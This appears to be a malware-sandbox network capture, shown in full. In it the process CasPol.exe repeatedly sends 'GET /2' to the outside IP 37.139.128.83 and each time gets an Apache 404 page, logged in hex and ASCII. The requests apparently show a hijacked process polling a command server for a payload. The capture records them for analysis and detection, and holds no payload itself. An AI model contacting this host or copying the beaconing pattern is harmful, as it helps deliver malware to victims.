                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:48.283715010 CET253INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:48.283776999 CET253INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:48.283837080 CET254INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:48.283891916 CET254INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    13192.168.11.204981737.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:18:58.314579010 CET254OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:58.372782946 CET255INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:58 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:58.372881889 CET256INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:58.372941971 CET256INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:58.372997999 CET256INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:58.373060942 CET256INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    14192.168.11.204981937.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:19:08.405410051 CET264OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:08.439033985 CET264INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:08 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:19:08.439058065 CET265INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:19:08.439074993 CET265INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:19:08.439090967 CET265INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:19:08.439105988 CET265INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    15192.168.11.204982037.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:19:18.465970039 CET266OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:18.525351048 CET267INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:18 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:19:18.525393963 CET267INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:19:18.525423050 CET267INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:19:18.525453091 CET268INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:19:18.525480986 CET268INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    16192.168.11.204982137.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:19:28.558624983 CET268OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:28.602679014 CET269INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:28 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:19:28.602756977 CET269INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:19:28.602807999 CET270INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:19:28.602854967 CET270INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:19:28.602905989 CET270INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    17192.168.11.204982337.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:19:38.633337021 CET278OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:38.664674044 CET278INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:38 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:19:38.664743900 CET279INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:19:38.664789915 CET279INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:19:38.664835930 CET279INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:19:38.664910078 CET279INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    18192.168.11.204982437.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:19:48.697762966 CET280OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:48.783301115 CET281INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:48 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:19:48.783382893 CET281INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:19:48.783437967 CET282INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:19:48.783518076 CET282INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:19:48.783611059 CET282INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    19192.168.11.204982537.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
